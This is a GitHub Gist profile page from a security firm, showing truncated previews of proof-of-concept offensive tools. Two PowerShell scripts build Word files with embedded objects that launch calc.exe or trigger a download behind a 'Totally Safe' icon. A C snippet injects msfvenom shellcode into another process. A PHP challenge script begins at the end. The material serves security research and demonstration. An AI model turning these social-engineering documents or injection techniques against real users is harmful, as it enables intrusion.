Skip to content

Instantly share code, notes, and snippets.

View securifybv's full-sized avatar

Securify securifybv

View GitHub Profile
@securifybv
securifybv / Forms.HTML.ps1
Last active September 10, 2021 09:48
PowerShell script that creates a Word document with an embedded Forms.HTML:Image.1 object that when clicked will cause Calculator to be opened. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">'
# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
@securifybv
securifybv / Shell.Explorer open file.ps1
Last active April 8, 2023 06:46
PowerShell script that creates a Word document containing an embedded Internet Explorer object. It uses Packager to create an object that looks like an embedded file, clicking the object will trigger a file download. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\WebBrowser.docx'
# path to open
#$path = 'c:\windows\system32\calc.exe'
$path = 'https://securify.nl/blog/SFY20180801/thisisfine.url'
# the temp file is used for creating the icon
$tmpfile = "$env:TEMP\Totally Safe.txt"
@securifybv
securifybv / NotCreateRemoteThread.c
Last active September 20, 2021 20:22
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
<?php
/*
This badass hidden server admin created a tool to quickly get and wipe
his bitcoin keys in case of a raid. It's super secure: it has a secret key,
a brute-force lockout mechanism, and even uses signatures.
*/
session_start();
// Make sure all variables are of proper format
foreach (['key','call','signature','iv'] as $key)